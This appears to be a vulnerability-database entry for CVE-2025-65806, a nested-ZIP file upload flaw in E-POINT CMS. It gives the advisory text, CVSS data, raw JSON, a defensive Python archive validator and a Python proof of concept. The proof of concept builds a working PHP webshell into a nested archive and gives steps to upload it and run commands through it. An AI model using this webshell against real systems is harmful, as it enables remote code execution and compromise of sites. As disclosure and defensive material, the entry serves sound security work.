Security Vulnerability Report
CVE-2025-65806 CVSS 4.3 MEDIUM

CVE-2025-65806

Published: 2025-12-04 20:16:20
Last Modified: 2026-03-11 21:16:11

Description

The E-POINT CMS eagle.gsam-1169.1 file upload feature improperly handles nested archive files. An attacker can upload a nested ZIP (a ZIP containing another ZIP) where the inner archive contains an executable file (e.g. webshell.php). When the application extracts the uploaded archives, the executable may be extracted into a web-accessible directory. This can lead to remote code execution (RCE), data disclosure, account compromise, or further system compromise depending on the web server/process privileges. The issue arises from insufficient validation of archive contents and inadequate restrictions on extraction targets.
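The root cause named above (insufficient validation of archive contents and of extraction targets) can be addressed by inspecting an upload in memory before anything is extracted. The following is an added example, not code from E-POINT CMS or from the advisory; the function names, the extension allow-list and the limits are assumptions, and it goes slightly beyond the description by also checking entry paths and by identifying nested archives from their content rather than their file name.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumed policy (not taken from the advisory): tune per deployment.
ALLOWED_EXTENSIONS = {".jpg", ".png", ".pdf", ".txt"}
MAX_DEPTH = 3                       # recursion bound when reporting nested archives
MAX_ENTRY_BYTES = 10 * 1024 * 1024  # limit on an entry's declared uncompressed size

def inspect_archive(data, depth=0, prefix=""):
    """Return policy violations for a ZIP given as bytes; nothing is written to disk."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = prefix + info.filename
            path = PurePosixPath(info.filename.replace("\\", "/"))
            if path.is_absolute() or ".." in path.parts:
                problems.append(f"{name}: path escapes the extraction directory")
            if info.file_size > MAX_ENTRY_BYTES:
                problems.append(f"{name}: entry exceeds size limit")
                continue
            body = zf.read(info)
            # Identify archives by content, not by the entry's file name.
            if zipfile.is_zipfile(io.BytesIO(body)):
                problems.append(f"{name}: nested archive")
                if depth < MAX_DEPTH:
                    problems += inspect_archive(body, depth + 1, name + "!/")
            elif path.suffix.lower() not in ALLOWED_EXTENSIONS:
                problems.append(f"{name}: extension {path.suffix or '(none)'} not allowed")
    return problems

def validate_upload(data):  # accept only well-formed ZIPs with no violations
    try:
        problems = inspect_archive(data)
    except zipfile.BadZipFile as exc:
        problems = [f"malformed archive: {exc}"]
    return (not problems, problems)

def make_zip(entries):
    """Build a ZIP in memory from {name: bytes}; used only for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()

if __name__ == "__main__":  # constructed sample: the layout from the description, inert content
    print(validate_upload(make_zip({"inner.zip": make_zip({"webshell.php": b"placeholder"})})))
```

Validation of this kind complements, and does not replace, extracting uploads to a directory the web server will not execute from.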

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:e-point:e-point_cms:eagle.gsam-1169.1:*:*:*:*:*:*:* - VULNERABLE
E-POINT CMS eagle.gsam-1169.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-65806 PoC - E-POINT CMS Nested ZIP File Upload RCE
This PoC demonstrates the nested ZIP archive upload vulnerability.
"""

import zipfile
import io
import sys


def create_webshell():
    """Create a simple PHP webshell"""
    return b"<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"


def create_nested_zip():
    """
    Create a nested ZIP file structure:
    outer.zip
    └── inner.zip
        └── webshell.php
    """
    # Create the inner ZIP with webshell
    inner_zip_buffer = io.BytesIO()
    with zipfile.ZipFile(inner_zip_buffer, 'w', zipfile.ZIP_DEFLATED) as inner_zip:
        inner_zip.writestr('webshell.php', create_webshell())
    inner_zip_data = inner_zip_buffer.getvalue()

    # Create the outer ZIP containing the inner ZIP
    outer_zip_buffer = io.BytesIO()
    with zipfile.ZipFile(outer_zip_buffer, 'w', zipfile.ZIP_DEFLATED) as outer_zip:
        outer_zip.writestr('inner.zip', inner_zip_data)
    return outer_zip_buffer.getvalue()


def main():
    print("[*] CVE-2025-65806 PoC - E-POINT CMS Nested ZIP Upload")
    print("[*] Generating nested ZIP payload...")
    nested_zip_data = create_nested_zip()

    # Save the PoC file
    output_file = 'CVE-2025-65806_nested_zip.zip'
    with open(output_file, 'wb') as f:
        f.write(nested_zip_data)

    print(f"[+] Created: {output_file}")
    print(f"[+] Size: {len(nested_zip_data)} bytes")
    print("[+] Upload this file through E-POINT CMS file upload feature")
    print("[+] After upload, access webshell.php via web browser")
    print("[+] Example: http://target.com/uploads/webshell.php?cmd=id")


if __name__ == '__main__':
    main()
```

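References

https://github.com/Bidon47/CVE-2025-65806/blob/main/CVE-2025-65806.md (Exploit, Third Party Advisory)
https://www.e-point.pl/produkty/e-point-cms (Product)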

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65806", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:19.563", "lastModified": "2026-03-11T21:16:11.257", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The E-POINT CMS eagle.gsam-1169.1 file upload feature improperly handles nested archive files. An attacker can upload a nested ZIP (a ZIP containing another ZIP) where the inner archive contains an executable file (e.g. webshell.php). When the application extracts the uploaded archives, the executable may be extracted into a web-accessible directory. This can lead to remote code execution (RCE), data disclosure, account compromise, or further system compromise depending on the web server/process privileges. The issue arises from insufficient validation of archive contents and inadequate restrictions on extraction targets."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:e-point:e-point_cms:eagle.gsam-1169.1:*:*:*:*:*:*:*", "matchCriteriaId": "441FDDBE-448F-4B80-B5FF-8585BF118A25"}]}]}], "references": [{"url": "https://github.com/Bidon47/CVE-2025-65806/blob/main/CVE-2025-65806.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://www.e-point.pl/produkty/e-point-cms", "source": "[email protected]", "tags": ["Product"]}]}}